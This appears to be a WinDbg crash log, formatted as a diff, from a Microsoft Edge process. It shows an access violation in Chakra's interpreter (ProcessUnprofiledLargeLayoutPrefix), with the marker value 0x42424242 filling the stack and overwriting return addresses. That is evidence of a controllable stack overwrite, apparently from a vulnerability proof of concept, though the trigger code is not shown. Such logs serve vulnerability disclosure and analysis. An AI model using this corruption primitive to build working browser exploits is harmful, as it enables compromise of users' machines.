+ModLoad: 00007ffe`a0d00000 00007ffe`a0e25000   C:\Windows\System32\RPCRT4.dll
+ModLoad: 00007ffe`9ebc0000 00007ffe`9ec2a000   C:\Windows\System32\bcryptPrimitives.dll
+ModLoad: 00007ffe`a0c50000 00007ffe`a0ced000   C:\Windows\System32\msvcrt.dll
+ModLoad: 00007ffe`98900000 00007ffe`98960000   C:\Windows\SYSTEM32\wincorlib.DLL
+ModLoad: 00007ffe`a1de0000 00007ffe`a1ea0000   C:\Windows\System32\OLEAUT32.dll
+ModLoad: 00007ffe`9ea70000 00007ffe`9eb0a000   C:\Windows\System32\msvcp_win.dll
+ModLoad: 00007ffe`9e330000 00007ffe`9e341000   C:\Windows\System32\kernel.appcore.dll
+ModLoad: 00007ffe`7d930000 00007ffe`7dcf4000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
+ModLoad: 00007ffe`9ece0000 00007ffe`9f3d2000   C:\Windows\System32\Windows.Storage.dll
+ModLoad: 00007ffe`a0b90000 00007ffe`a0c31000   C:\Windows\System32\advapi32.dll
+ModLoad: 00007ffe`9f400000 00007ffe`9f459000   C:\Windows\System32\sechost.dll
+ModLoad: 00007ffe`96080000 00007ffe`96306000   C:\Windows\SYSTEM32\iertutil.dll
+ModLoad: 00007ffe`a13b0000 00007ffe`a1401000   C:\Windows\System32\shlwapi.dll
+ModLoad: 00007ffe`a0e30000 00007ffe`a0eda000   C:\Windows\System32\shcore.dll
+ModLoad: 00007ffe`9f460000 00007ffe`9f487000   C:\Windows\System32\GDI32.dll
+ModLoad: 00007ffe`9e8e0000 00007ffe`9ea69000   C:\Windows\System32\gdi32full.dll
+ModLoad: 00007ffe`a1c90000 00007ffe`a1dda000   C:\Windows\System32\USER32.dll
+ModLoad: 00007ffe`9f3e0000 00007ffe`9f3fe000   C:\Windows\System32\win32u.dll
+ModLoad: 00007ffe`9e370000 00007ffe`9e3bc000   C:\Windows\System32\powrprof.dll
+ModLoad: 00007ffe`9e310000 00007ffe`9e325000   C:\Windows\System32\profapi.dll
+ModLoad: 00007ffe`9e210000 00007ffe`9e239000   C:\Windows\SYSTEM32\USERENV.dll
+ModLoad: 00007ffe`8d040000 00007ffe`8d066000   C:\Windows\SYSTEM32\clipc.dll
+ModLoad: 00007ffe`9d610000 00007ffe`9d641000   C:\Windows\SYSTEM32\ntmarta.dll
+ModLoad: 00007ffe`9dd60000 00007ffe`9dd77000   C:\Windows\SYSTEM32\cryptsp.dll
+ModLoad: 00007ffe`9d9a0000 00007ffe`9da44000   C:\Windows\SYSTEM32\DNSAPI.dll
+ModLoad: 00007ffe`a18b0000 00007ffe`a191c000   C:\Windows\System32\WS2_32.dll
+ModLoad: 00007ffe`a0b20000 00007ffe`a0b28000   C:\Windows\System32\NSI.dll
+ModLoad: 00007ffe`a0a40000 00007ffe`a0a6d000   C:\Windows\System32\IMM32.DLL
+ModLoad: 00007ffe`9d960000 00007ffe`9d997000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
+ModLoad: 00007ffe`9ccc0000 00007ffe`9ce30000   C:\Windows\SYSTEM32\twinapi.appcore.dll
+ModLoad: 00007ffe`9e1e0000 00007ffe`9e205000   C:\Windows\SYSTEM32\bcrypt.dll
+ModLoad: 00007ffe`9d440000 00007ffe`9d461000   C:\Windows\SYSTEM32\profext.dll
+ModLoad: 00007ffe`8c940000 00007ffe`8c9b4000   C:\Windows\SYSTEM32\msiso.dll
+ModLoad: 00007ffe`983e0000 00007ffe`98402000   C:\Windows\SYSTEM32\EShims.dll
+ModLoad: 00007ffe`90b10000 00007ffe`90b2b000   C:\Windows\SYSTEM32\MPR.dll
+ModLoad: 00007ffe`a1920000 00007ffe`a1a65000   C:\Windows\System32\ole32.dll
+ModLoad: 00007ffe`9cab0000 00007ffe`9cb45000   C:\Windows\system32\uxtheme.dll
+ModLoad: 00007ffe`8b6f0000 00007ffe`8b791000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
+ModLoad: 00007ffe`81fa0000 00007ffe`83651000   C:\Windows\SYSTEM32\edgehtml.dll
+ModLoad: 00007ffe`9a690000 00007ffe`9a7c9000   C:\Windows\SYSTEM32\wintypes.dll
+ModLoad: 00007ffe`915c0000 00007ffe`915ff000   C:\Windows\SYSTEM32\MLANG.dll
+ModLoad: 00007ffe`80f50000 00007ffe`8173a000   C:\Windows\SYSTEM32\chakra.dll
+ModLoad: 00007ffe`9afe0000 00007ffe`9b056000   C:\Windows\SYSTEM32\policymanager.dll
+ModLoad: 00007ffe`9af20000 00007ffe`9afaf000   C:\Windows\SYSTEM32\msvcp110_win.dll
+ModLoad: 00007ffe`9b2d0000 00007ffe`9b466000   C:\Windows\SYSTEM32\PROPSYS.dll
+ModLoad: 00007ffe`88e90000 00007ffe`88f5b000   C:\Windows\System32\ieproxy.dll
+ModLoad: 00007ffe`98590000 00007ffe`98696000   C:\Windows\System32\Windows.UI.dll
+ModLoad: 00007ffe`98500000 00007ffe`98582000   C:\Windows\SYSTEM32\TextInputFramework.dll
+ModLoad: 00007ffe`99ad0000 00007ffe`99da2000   C:\Windows\SYSTEM32\CoreUIComponents.dll
+ModLoad: 00007ffe`9c1d0000 00007ffe`9c2b3000   C:\Windows\SYSTEM32\CoreMessaging.dll
+ModLoad: 00007ffe`9ae40000 00007ffe`9ae55000   C:\Windows\SYSTEM32\usermgrcli.dll
+ModLoad: 00007ffe`98f20000 00007ffe`99451000   C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
+ModLoad: 00007ffe`9b470000 00007ffe`9b49a000   C:\Windows\SYSTEM32\dwmapi.dll
+ModLoad: 00007ffe`9f490000 00007ffe`a08c7000   C:\Windows\System32\shell32.dll
+ModLoad: 00007ffe`9ec30000 00007ffe`9ec79000   C:\Windows\System32\cfgmgr32.dll
+ModLoad: 00007ffe`a08d0000 00007ffe`a0a36000   C:\Windows\System32\msctf.dll
+ModLoad: 00007ffe`98700000 00007ffe`98802000   C:\Windows\SYSTEM32\mrmcorer.dll
+ModLoad: 00007ffe`8d070000 00007ffe`8d39e000   C:\Windows\SYSTEM32\WININET.dll
+ModLoad: 00007ffe`9e240000 00007ffe`9e270000   C:\Windows\SYSTEM32\SspiCli.dll
+ModLoad: 00007ffe`98860000 00007ffe`988c9000   C:\Windows\SYSTEM32\Bcp47Langs.dll
+ModLoad: 00007ffe`8a7c0000 00007ffe`8a7d0000   C:\Windows\SYSTEM32\tokenbinding.dll
+ModLoad: 00007ffe`8d800000 00007ffe`8d81b000   C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
+ModLoad: 00007ffe`963d0000 00007ffe`964a7000   C:\Windows\SYSTEM32\winhttp.dll
+ModLoad: 00007ffe`9dbc0000 00007ffe`9dc1c000   C:\Windows\system32\mswsock.dll
+ModLoad: 00007ffe`9a290000 00007ffe`9a29b000   C:\Windows\SYSTEM32\WINNSI.DLL
+ModLoad: 00007ffe`957f0000 00007ffe`959b8000   C:\Windows\SYSTEM32\urlmon.dll
+ModLoad: 00007ffe`9dd80000 00007ffe`9dd8b000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
+ModLoad: 00007ffe`8ca20000 00007ffe`8ca3a000   C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
+ModLoad: 00007ffe`7fed0000 00007ffe`8005a000   C:\Windows\SYSTEM32\ieapfltr.dll
+ModLoad: 00007ffe`999d0000 00007ffe`999ed000   C:\Windows\System32\rmclient.dll
+ModLoad: 00007ffe`89aa0000 00007ffe`89ab8000   C:\Windows\System32\UiaManager.dll
+ModLoad: 00007ffe`8a860000 00007ffe`8a8a7000   C:\Windows\system32\dataexchange.dll
+ModLoad: 00007ffe`9c2c0000 00007ffe`9c3e2000   C:\Windows\SYSTEM32\dcomp.dll
+ModLoad: 00007ffe`9b940000 00007ffe`9bc1f000   C:\Windows\SYSTEM32\d3d11.dll
+ModLoad: 00007ffe`9d180000 00007ffe`9d224000   C:\Windows\SYSTEM32\dxgi.dll
+ModLoad: 00007ffe`8bb90000 00007ffe`8bc12000   C:\Windows\system32\twinapi.dll
+ModLoad: 00007ffe`84db0000 00007ffe`84e2a000   C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
+ModLoad: 00007ffe`81c30000 00007ffe`81c58000   C:\Windows\SYSTEM32\srpapi.dll
+ModLoad: 00007ffe`9e3c0000 00007ffe`9e589000   C:\Windows\System32\CRYPT32.dll
+ModLoad: 00007ffe`9e350000 00007ffe`9e361000   C:\Windows\System32\MSASN1.dll
+ModLoad: 00007ffe`846e0000 00007ffe`8473a000   C:\Windows\System32\Windows.Graphics.dll
+ModLoad: 00007ffe`8cf00000 00007ffe`8cf5d000   C:\Windows\SYSTEM32\ninput.dll
+ModLoad: 00007ffe`9bc20000 00007ffe`9c1c4000   C:\Windows\SYSTEM32\d2d1.dll
+ModLoad: 00007ffe`943a0000 00007ffe`94660000   C:\Windows\SYSTEM32\DWrite.dll
+ModLoad: 00007ffe`81910000 00007ffe`8191f000   C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
+ModLoad: 00007ffe`99510000 00007ffe`99552000   C:\Windows\SYSTEM32\vm3dum64.dll
+ModLoad: 00007ffe`994a0000 00007ffe`99507000   C:\Windows\SYSTEM32\D3D10Level9.dll
+ModLoad: 00007ffe`8b4b0000 00007ffe`8b51b000   C:\Windows\System32\oleacc.dll
+ModLoad: 00007ffe`81bf0000 00007ffe`81c00000   C:\Windows\system32\msimtf.dll
+ModLoad: 00007ffe`940f0000 00007ffe`94178000   C:\Windows\system32\directmanipulation.dll
+ModLoad: 00007ffe`98170000 00007ffe`98184000   C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
+ModLoad: 00007ffe`81bb0000 00007ffe`81be8000   C:\Windows\System32\smartscreenps.dll
+ModLoad: 00007ffe`94210000 00007ffe`94398000   C:\Windows\SYSTEM32\windows.globalization.dll
+ModLoad: 00007ffe`8b520000 00007ffe`8b6e5000   C:\Windows\System32\uiautomationcore.dll
+(1590.5d8): Break instruction exception - code 80000003 (first chance)
+ntdll!DbgBreakPoint:
+00007ffe`a1f48d70 cc              int     3
+0:035> g
+onecoreuap\inetcore\urlmon\zones\zoneidentifier.cxx(359)\urlmon.dll!00007FFE958108C0: (caller: 00007FFE9580F77D) ReturnHr(2) tid(b70) 80070002 œµÕ≥’“≤ªµΩ÷∏∂®µƒŒƒº˛°£
+(1590.b70): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
+00007ffe`8133ba8d 488904d1        mov     qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=????????????????
+0:016> r
+rax=0001000042424242 rbx=000002aa98205cbb rcx=000000d8b83f9e98
+rdx=0000000000000c2d rsi=0000000000000000 rdi=000002aa98200025
+rip=00007ffe8133ba8d rsp=000000d8b83f9bd0 rbp=000000d8b83f9c00
+ r8=000000d8b83f9d20  r9=000002aa8688fe00 r10=000002aa86879760
+r11=000000d8b83f9978 r12=0000000000000000 r13=000002aa8312a270
+r14=0000000000000000 r15=000002aa98205cc2
+iopl=0         nv up ei pl nz ac pe nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
+chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
+00007ffe`8133ba8d 488904d1        mov     qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=????????????????
+0:016> dq ecx
+000000d8`b83f9e98  00000000`00000030 000002aa`86879760
+000000d8`b83f9ea8  00010000`42424242 00010000`42424242
+000000d8`b83f9eb8  00010000`42424242 00010000`42424242
+000000d8`b83f9ec8  00010000`42424242 00010000`42424242
+000000d8`b83f9ed8  00010000`42424242 00010000`42424242
+000000d8`b83f9ee8  00010000`42424242 00010000`42424242
+000000d8`b83f9ef8  00010000`42424242 00010000`42424242
+000000d8`b83f9f08  00010000`42424242 00010000`42424242
+0:016> dq [ecx+edx*8]
+000000d8`b8400000  ????????`???????? ????????`????????
+000000d8`b8400010  ????????`???????? ????????`????????
+000000d8`b8400020  ????????`???????? ????????`????????
+000000d8`b8400030  ????????`???????? ????????`????????
+000000d8`b8400040  ????????`???????? ????????`????????
+000000d8`b8400050  ????????`???????? ????????`????????
+000000d8`b8400060  ????????`???????? ????????`????????
+000000d8`b8400070  ????????`???????? ????????`????????
+0:016> !address 000000d8`b8400000 
+
+                                     
+Usage:                  
+Allocation Base:        000000d8`b8400000
+Base Address:           000000d8`b8400000
+End Address:            000000d8`b84fc000
+Region Size:            00000000`000fc000
+Type:                   00020000	MEM_PRIVATE
+State:                  00002000	MEM_RESERVE
+Protect:                00000000	
+More info:              ~17k
+
+0:016> !address ecx
+Usage:                  Stack
+Allocation Base:        000000d8`b7a00000
+Base Address:           000000d8`b83f4000
+End Address:            000000d8`b8400000
+Region Size:            00000000`0000c000
+Type:                   00020000	MEM_PRIVATE
+State:                  00001000	MEM_COMMIT
+Protect:                00000004	PAGE_READWRITE
+More info:              ~16k
+
+0:016> kb
+RetAddr           : Args to Child                                                           : Call Site
+00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
+00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5
+00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
+00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
